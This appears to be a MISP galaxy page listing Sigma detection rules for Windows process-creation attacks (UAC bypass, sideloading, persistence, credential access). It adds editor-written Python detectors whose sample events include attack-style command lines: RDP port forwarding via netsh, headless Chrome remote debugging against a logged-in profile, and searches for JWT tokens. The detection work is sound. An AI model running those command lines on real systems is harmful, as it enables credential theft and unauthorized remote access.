UUID 24c77512-782b-448a-8950-eddb0785fc71 which can be used as unique global reference for SQLite Chromium Profile Data DB Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TropChaud
creation_date 2022/12/19
falsepositive ['Unknown']
filename proc_creation_win_sqlite_chromium_profile_data.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1539', 'attack.t1555.003', 'attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

PsExec Service Execution

Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution

Internal MISP references

UUID fdfcbd78-48f1-4a4b-90ac-d82241e368c5 which can be used as unique global reference for PsExec Service Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
creation_date 2017/06/12
falsepositive ['Legitimate administrative tasks']
filename proc_creation_win_sysinternals_psexesvc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential DLL Injection Or Execution Using Tracker.exe

Detects potential DLL injection and execution using "Tracker.exe"

Internal MISP references

UUID 148431ce-4b70-403d-8525-fcc2993f29ea which can be used as unique global reference for Potential DLL Injection Or Execution Using Tracker.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Avneet Singh @v3t0_, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename proc_creation_win_lolbin_tracker.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious PowerShell Child Processes

Detects potentially suspicious child processes spawned by PowerShell

Internal MISP references

UUID e4b6d2a7-d8a4-4f19-acbd-943c16d90647 which can be used as unique global reference for Potentially Suspicious PowerShell Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2022/04/26
falsepositive ['Some false positive is to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed.']
filename proc_creation_win_powershell_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

HackTool - CrackMapExec Process Patterns

Detects suspicious process patterns found in logs when CrackMapExec is used

Internal MISP references

UUID f26307d8-14cd-47e3-a26b-4b4769f24af6 which can be used as unique global reference for HackTool - CrackMapExec Process Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/12
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Portable Gpg.EXE Execution

Detects the execution of "gpg.exe" from an uncommon location. Such portable copies are often used by ransomware and loaders to encrypt or decrypt data.

Internal MISP references

UUID 77df53a5-1d78-4f32-bc5a-0e7465bd8f41 which can be used as unique global reference for Portable Gpg.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/06
falsepositive No established falsepositives
filename proc_creation_win_gpg4win_portable_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1486']

Suspicious Child Process Of Manage Engine ServiceDesk

Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service

Internal MISP references

UUID cea2b7ea-792b-405f-95a1-b903ea06458f which can be used as unique global reference for Suspicious Child Process Of Manage Engine ServiceDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/01/18
falsepositive ['Legitimate sub processes started by Manage Engine ServiceDesk Pro']
filename proc_creation_win_java_manageengine_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']

New Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule

Internal MISP references

UUID 322ed9ec-fcab-4f67-9a34-e7c6aef43614 which can be used as unique global reference for New Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
creation_date 2019/01/29
falsepositive ['Legitimate administration activity', 'WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)']
filename proc_creation_win_netsh_port_forwarding.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.command_and_control', 'attack.t1090']
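
As an added example (editor's code, not the Sigma rule's own logic and not part of the MISP page), the Python below parses the netsh PortProxy command lines this rule looks for and pulls out the listen and connect endpoints, so the finding states where traffic is being redirected instead of only that a rule was added. The handling of abbreviated netsh keywords, the event field names (`CommandLine`, `ParentImage`, in Sysmon/Sigma process_creation style) and the sample events are assumptions made for the demo.

```python
"""Added example (not the Sigma rule's logic, not code from the MISP page):
parse 'netsh interface portproxy add' command lines and report the redirect.

Event fields follow the Sysmon/Sigma process_creation naming; every event
below is a constructed sample, not real telemetry.
"""

PORTPROXY_MODES = {"v4tov4", "v4tov6", "v6tov4", "v6tov6"}


def _abbrev(token, keyword):
    """netsh accepts any unambiguous prefix of a keyword, so 'int p a' equals
    'interface portproxy add'. The detector treats any prefix as a hit, which is
    deliberately looser than netsh's own ambiguity check."""
    return bool(token) and keyword.startswith(token.lower())


def parse_portproxy(cmdline):
    """Return {mode, listenaddress, listenport, connectaddress, connectport} for a
    'netsh interface portproxy add <mode> key=value ...' command line, else None."""
    # PortProxy arguments never contain spaces, so a whitespace split is enough;
    # quotes only ever wrap the image path.
    argv = [t.strip('"') for t in cmdline.split()]
    if len(argv) < 5:
        return None
    image = argv[0].lower()
    if image not in ("netsh", "netsh.exe") and not image.endswith("\\netsh.exe"):
        return None
    if not (_abbrev(argv[1], "interface") and _abbrev(argv[2], "portproxy")
            and _abbrev(argv[3], "add")):
        return None
    mode = argv[4].lower()
    if mode not in PORTPROXY_MODES:
        return None
    # netsh shows '*' for the listen address when it was omitted; the other
    # fields stay None when omitted so the finding does not invent a value.
    fields = {"mode": mode, "listenaddress": "*", "listenport": None,
              "connectaddress": None, "connectport": None}
    for pair in argv[5:]:
        key, sep, value = pair.partition("=")
        if sep and key.lower() in fields:
            fields[key.lower()] = value
    return fields


def detect_portproxy(event):
    """Return a one-line finding for a process_creation event that adds a
    PortProxy rule, or None for anything else."""
    rule = parse_portproxy(event.get("CommandLine", ""))
    if rule is None:
        return None
    return (f"netsh portproxy {rule['mode']}: "
            f"{rule['listenaddress']}:{rule['listenport']} -> "
            f"{rule['connectaddress']}:{rule['connectport']} "
            f"(parent: {event.get('ParentImage', '?')})")


SAMPLE_EVENTS = [  # constructed samples
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "netsh interface portproxy add v4tov4 listenport=3340 "
                    "listenaddress=0.0.0.0 connectport=3389 connectaddress=127.0.0.1"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\netsh.exe" int p a v4tov4 '
                    r"listenport=8080 connectport=443 connectaddress=10.10.5.7"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "netsh interface portproxy show all"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "netsh advfirewall firewall add rule name=web dir=in action=allow"},
]


def findings(events=SAMPLE_EVENTS):
    """Run the detector over a list of events and return the non-empty findings."""
    return [f for f in map(detect_portproxy, events) if f]


if __name__ == "__main__":
    for line in findings():
        print(line)
```

The first sample is the classic RDP exposure (listen on all interfaces, connect to the local 3389); the second uses abbreviated keywords, which is why a detection keyed only on the literal word `portproxy` is narrower than the behaviour it is meant to catch.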

Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a specific script to run on a specific VM state change

Internal MISP references

UUID 7aa4e81a-a65c-4e10-9f81-b200eb229d7d which can be used as unique global reference for Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/14
falsepositive ['Unknown']
filename proc_creation_win_vmware_toolbox_cmd_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1059']

Potential Execution of Sysinternals Tools

Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools

Internal MISP references

UUID 7cccd811-7ae9-4ebe-9afd-cb5c406b824b which can be used as unique global reference for Potential Execution of Sysinternals Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2017/08/28
falsepositive ['Legitimate use of SysInternals tools', 'Programs that use the same command line flag']
filename proc_creation_win_sysinternals_eula_accepted.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']

Suspicious Schtasks Execution AppData Folder

Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local

Internal MISP references

UUID c5c00f49-b3f9-45a6-997e-cfdecc6e1967 which can be used as unique global reference for Suspicious Schtasks Execution AppData Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/03/15
falsepositive ['Unknown']
filename proc_creation_win_schtasks_appdata_local_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']

Suspicious Runscripthelper.exe

Detects execution of PowerShell scripts via Runscripthelper.exe

Internal MISP references

UUID eca49c87-8a75-4f13-9c73-a5a29e845f03 which can be used as unique global reference for Suspicious Runscripthelper.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_lolbin_runscripthelper.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']

UAC Bypass Using Disk Cleanup

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

Internal MISP references

UUID b697e69c-746f-4a86-9f59-7bfff8eab881 which can be used as unique global reference for UAC Bypass Using Disk Cleanup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_cleanmgr.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Suspicious Parent Double Extension File Execution

Detects the execution of suspicious double-extension files in the ParentCommandLine

Internal MISP references

UUID 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c which can be used as unique global reference for Suspicious Parent Double Extension File Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/06
falsepositive ['Unknown']
filename proc_creation_win_susp_double_extension_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.007']

ZOHO Dctask64 Process Injection

Detects suspicious process injection using ZOHO's dctask64.exe

Internal MISP references

UUID 6345b048-8441-43a7-9bed-541133633d7a which can be used as unique global reference for ZOHO Dctask64 Process Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/28
falsepositive ['Unknown']
filename proc_creation_win_lolbin_dctask64_proc_inject.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055.001']

UAC Bypass Using Event Viewer RecentViews

Detects the pattern of UAC Bypass using Event Viewer RecentViews

Internal MISP references

UUID 30fc8de7-d833-40c4-96b6-28319fbc4f6c which can be used as unique global reference for UAC Bypass Using Event Viewer RecentViews in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/22
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_eventvwr_recentviews.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Imports Registry Key From an ADS

Detects the import of an alternate data stream into the registry with regedit.exe.

Internal MISP references

UUID 0b80ade5-6997-4b1d-99a1-71701778ea61 which can be used as unique global reference for Imports Registry Key From an ADS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_regedit_import_keys_ads.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']

Suspicious Binary In User Directory Spawned From Office Application

Detects an executable in the user's directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)

Internal MISP references

UUID aa3a6f94-890e-4e22-b634-ffdfd54792cc which can be used as unique global reference for Suspicious Binary In User Directory Spawned From Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jason Lynch
creation_date 2019/04/02
falsepositive ['Unknown']
filename proc_creation_win_office_spawn_exe_from_users_directory.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1204.002', 'attack.g0046', 'car.2013-05-002']

Detect Virtualbox Driver Installation OR Starting Of VMs

Adversaries can carry out malicious operations inside a virtual instance to avoid detection. This rule detects the registration of the VirtualBox driver or the start of a VirtualBox VM.

Internal MISP references

UUID bab049ca-7471-4828-9024-38279a4c04da which can be used as unique global reference for Detect Virtualbox Driver Installation OR Starting Of VMs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2020/09/26
falsepositive ['This may have false positives on hosts where Virtualbox is legitimately being used for operations']
filename proc_creation_win_virtualbox_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.006', 'attack.t1564']

Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution

Detects execution of the Windows Defender "OfflineScannerShell.exe" from a non-standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.

Internal MISP references

UUID 02b18447-ea83-4b1b-8805-714a8a34546a which can be used as unique global reference for Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/06
falsepositive ['Unknown']
filename proc_creation_win_offlinescannershell_mpclient_sideloading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Potential Data Stealing Via Chromium Headless Debugging

Detects Chromium-based browsers starting in headless mode with remote debugging enabled and pointing at a user profile. This could be a sign of data theft or remote control

Internal MISP references

UUID 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 which can be used as unique global reference for Potential Data Stealing Via Chromium Headless Debugging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_headless_debugging.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1185']
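
As an added example (editor's code, not the rule's own logic and not from the MISP page), the Python below parses Chromium-style switches out of a process_creation command line and grades the headless + remote-debugging + user-data-dir combination described above. It adds one distinction the description does not make: a `--user-data-dir` that is a real, logged-in browser profile (where cookies and session tokens live) is graded higher than a throw-away profile of the kind test-automation frameworks create. The browser names, the profile-path markers and the sample events are assumptions for the demo.

```python
"""Added example (not the rule's logic, not code from the MISP page): grade
headless Chromium launches with remote debugging against a user-data-dir.
Events are constructed samples.
"""
from pathlib import PureWindowsPath

# Assumption: common Chromium-based browser image names.
CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe",
                     "vivaldi.exe", "opera.exe"}

# Assumption: substrings that mark a real (logged-in) profile directory. Anything
# else is treated as a throw-away profile such as Puppeteer/Playwright create.
BROWSER_PROFILE_MARKERS = ("\\google\\chrome\\user data",
                           "\\microsoft\\edge\\user data",
                           "\\bravesoftware\\brave-browser\\user data")


def win_argv(cmdline):
    """Split a Windows command line: whitespace separates arguments and double
    quotes may appear anywhere inside one (e.g. --user-data-dir="C:\\x\\User Data")
    and are removed. Backslash-escape rules are ignored, which is fine for
    switches and paths."""
    args, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def chromium_switches(cmdline):
    """Return (image name, {switch: value}); switches are '--name' or '--name=value'."""
    argv = win_argv(cmdline)
    if not argv:
        return "", {}
    switches = {}
    for arg in argv[1:]:
        if arg.startswith("--"):
            name, _, value = arg[2:].partition("=")
            switches[name.lower()] = value
    return PureWindowsPath(argv[0]).name.lower(), switches


def detect_headless_debugging(event):
    """Return a finding dict for a Chromium browser started headless with remote
    debugging against a user-data-dir, else None. Severity is 'high' when the
    profile is a real browser profile and 'medium' otherwise."""
    image, sw = chromium_switches(event.get("CommandLine", ""))
    if image not in CHROMIUM_BROWSERS or "headless" not in sw:   # --headless or --headless=new
        return None
    port = sw.get("remote-debugging-port")
    if port is None and "remote-debugging-pipe" not in sw:
        return None
    profile = sw.get("user-data-dir")
    if not profile:
        return None
    real = any(m in profile.lower() for m in BROWSER_PROFILE_MARKERS)
    return {"severity": "high" if real else "medium", "browser": image,
            "debug": port if port is not None else "pipe", "profile": profile}


SAMPLE_EVENTS = [  # constructed samples
    {"CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless '
                    r'--remote-debugging-port=9222 '
                    r'--user-data-dir="C:\Users\alice\AppData\Local\Google\Chrome\User Data" '
                    r'--profile-directory=Default'},
    {"CommandLine": r"chrome.exe --headless=new --remote-debugging-port=0 "
                    r"--user-data-dir=C:\Users\bob\AppData\Local\Temp\puppeteer_dev_profile-4f2a about:blank"},
    {"CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" '
                    r'--remote-debugging-port=9222 --user-data-dir="C:\Users\alice\AppData\Local\Microsoft\Edge\User Data"'},
    {"CommandLine": r"chrome.exe --headless --dump-dom https://example.com"},
]


def findings(events=SAMPLE_EVENTS):
    """Return the findings for a list of events (None results dropped)."""
    return [f for f in map(detect_headless_debugging, events) if f]


if __name__ == "__main__":
    for f in findings():
        print(f)
```

The third sample has remote debugging against a real Edge profile but no `--headless`, so it stays outside this rule's scope even though it is worth a separate look; the fourth is a plain headless render with no debugging endpoint.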

Suspicious Office Token Search Via CLI

Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.

Internal MISP references

UUID 6d3a3952-6530-44a3-8554-cf17c116c615 which can be used as unique global reference for Suspicious Office Token Search Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/25
falsepositive ['Unknown']
filename proc_creation_win_susp_office_token_search.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']
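
As an added example (editor's code, not part of the rule or this page), the Python below computes why "eyJ0eX" is a usable anchor, decodes a JWT header the way a triage script would, and runs a case-insensitive contains check over constructed command lines. The `SEARCH_TOOLS` list and the sample command lines are assumptions for the demo; the second anchor, `eyJhbGci`, is derived the same way and is not something the rule uses.

```python
"""Added example (not the rule's logic, not code from the MISP page): why "eyJ0eX"
anchors JWTs, and a contains-style check over constructed command lines.

A JWT's first segment is the base64url-encoded JSON header. Any header that
starts with {"typ" encodes to a string starting with eyJ0eX; headers that list
"alg" first start with eyJhbGci instead. Both facts are computed below.
"""
import base64
import json


def b64url_header(header):
    """Encode a JWT header object exactly as a token carries it (base64url,
    no padding, compact JSON, key order preserved)."""
    raw = json.dumps(header, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt_header(token):
    """Return the decoded header of a JWT string (only the first segment is read)."""
    seg = token.split(".")[0]
    seg += "=" * (-len(seg) % 4)          # restore the padding base64url drops
    return json.loads(base64.urlsafe_b64decode(seg))


# Anchors derived from the encoding rule above; the Sigma rule uses the first.
JWT_ANCHORS = {
    "typ-first": b64url_header({"typ": ""})[:6],     # 'eyJ0eX'
    "alg-first": b64url_header({"alg": ""})[:8],     # 'eyJhbGci'
}

# Assumption: tools an operator would use to grep a disk for tokens.
SEARCH_TOOLS = ("findstr", "find ", "select-string", "sls ", "grep", "rg ")


def classify_commandline(cmdline):
    """Return which anchors a command line contains and whether a search tool
    appears beside them. Matching is lower-cased to mirror Sigma's
    case-insensitive 'contains'. The rule fires on the anchor alone; the tool
    name is extra triage context, not part of the rule."""
    low = cmdline.lower()
    hits = [name for name, anchor in JWT_ANCHORS.items() if anchor.lower() in low]
    return {"anchors": hits, "search_tool": any(t in low for t in SEARCH_TOOLS)}


SAMPLE_COMMANDLINES = [  # constructed samples
    r"findstr /s /i eyJ0eX C:\Users\alice\AppData\Local\Microsoft\*",
    r'powershell -c "gci C:\Users -r | sls eyJ0eX"',
    r"cmd.exe /c echo hello",
]


def triage(cmdlines=SAMPLE_COMMANDLINES):
    """Return the command lines that contain at least one JWT anchor."""
    return [c for c in cmdlines if classify_commandline(c)["anchors"]]


if __name__ == "__main__":
    demo = b64url_header({"typ": "JWT", "alg": "RS256"}) + ".e30.sig"
    print(demo[:8], decode_jwt_header(demo))
    for c in triage():
        print("hit:", c)
```

Key order in the header decides the prefix: a token whose header starts with `{"alg"` is invisible to the `eyJ0eX` anchor, so a hunt that relies on this string alone should add the `eyJhbGci` form as well.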

Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE

Detects potential malicious and unauthorized usage of bcdedit.exe

Internal MISP references

UUID c9fbe8e9-119d-40a6-9b59-dd58a5d84429 which can be used as unique global reference for Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2019/02/07
falsepositive No established falsepositives
filename proc_creation_win_bcdedit_susp_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.persistence', 'attack.t1542.003']

DirLister Execution

Detects the usage of "DirLister.exe", a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.

Internal MISP references

UUID b4dc61f5-6cce-468e-a608-b48b469feaa2 which can be used as unique global reference for DirLister Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Legitimate use by users']
filename proc_creation_win_dirlister_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1083']

Devtoolslauncher.exe Executes Specified Binary

Detects Devtoolslauncher.exe being used to execute another binary specified on its command line

Internal MISP references

UUID cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6 which can be used as unique global reference for Devtoolslauncher.exe Executes Specified Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community (rule), @_felamos (idea)
creation_date 2019/10/12
falsepositive ['Legitimate use of devtoolslauncher.exe by legitimate user']
filename proc_creation_win_lolbin_devtoolslauncher.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors for data exfiltration

Internal MISP references

UUID e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a which can be used as unique global reference for File Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/02/24
falsepositive ['As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly']
filename proc_creation_win_certutil_encode.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']

Potential Privilege Escalation via Service Permissions Weakness

Detects modification of service configuration values (ImagePath, FailureCommand and ServiceDLL) in the registry by processes with Medium integrity level

Internal MISP references

UUID 0f9c21f1-6a73-4b0e-9809-cb562cb8d981 which can be used as unique global reference for Potential Privilege Escalation via Service Permissions Weakness in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_registry_privilege_escalation_via_service_key.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1574.011']

Potential Renamed Rundll32 Execution

Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection

Internal MISP references

UUID 2569ed8c-1147-498a-9b8c-2ad3656b10ed which can be used as unique global reference for Potential Renamed Rundll32 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unlikely']
filename proc_creation_win_renamed_rundll32_dllregisterserver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

New ActiveScriptEventConsumer Created Via Wmic.EXE

Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence

Internal MISP references

UUID ebef4391-1a81-4761-a40a-1db446c0e625 which can be used as unique global reference for New ActiveScriptEventConsumer Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/25
falsepositive ['Legitimate software creating script event consumers']
filename proc_creation_win_wmic_eventconsumer_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.003']

Potential Privilege Escalation To LOCAL SYSTEM

Detects an unknown program using command-line flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM privileges

Internal MISP references

UUID 207b0396-3689-42d9-8399-4222658efc99 which can be used as unique global reference for Potential Privilege Escalation To LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/05/22
falsepositive ['Weird admins that rename their tools', 'Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing']
filename proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']

Possible Privilege Escalation via Weak Service Permissions

Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service's ImagePath or FailureCommand

Internal MISP references

UUID d937b75f-a665-4480-88a5-2f20e9f9b22a which can be used as unique global reference for Possible Privilege Escalation via Weak Service Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']

ShimCache Flush

Detects actions that clear the local ShimCache and remove forensic evidence

Internal MISP references

UUID b0524451-19af-4efa-a46f-562a977f792e which can be used as unique global reference for ShimCache Flush in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/01
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_shimcache_flush.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

Console CodePage Lookup Via CHCP

Detects use of chcp to look up the system locale value as part of host discovery

Internal MISP references

UUID 7090adee-82e2-4269-bd59-80691e7c6338 which can be used as unique global reference for Console CodePage Lookup Via CHCP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022/02/21
falsepositive ["During Anaconda update the 'conda.exe' process will eventually execute the 'chcp' command.", 'Discord was seen using chcp to look up code pages']
filename proc_creation_win_chcp_codepage_lookup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1614.001']

HackTool - SharPersist Execution

Detects the execution of the hacktool SharPersist, used to deploy various kinds of persistence mechanisms

Internal MISP references

UUID 26488ad0-f9fd-4536-876f-52fea846a2e4 which can be used as unique global reference for HackTool - SharPersist Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpersist.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1053']

Suspicious File Characteristics Due to Missing Fields

Detects executables in the Downloads folder without the FileVersion, Description, Product and Company fields, which are likely created with py2exe

Internal MISP references

UUID 9637e8a5-7131-4f7f-bdc7-2b05d8670c43 which can be used as unique global reference for Suspicious File Characteristics Due to Missing Fields in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Sander Wiebing
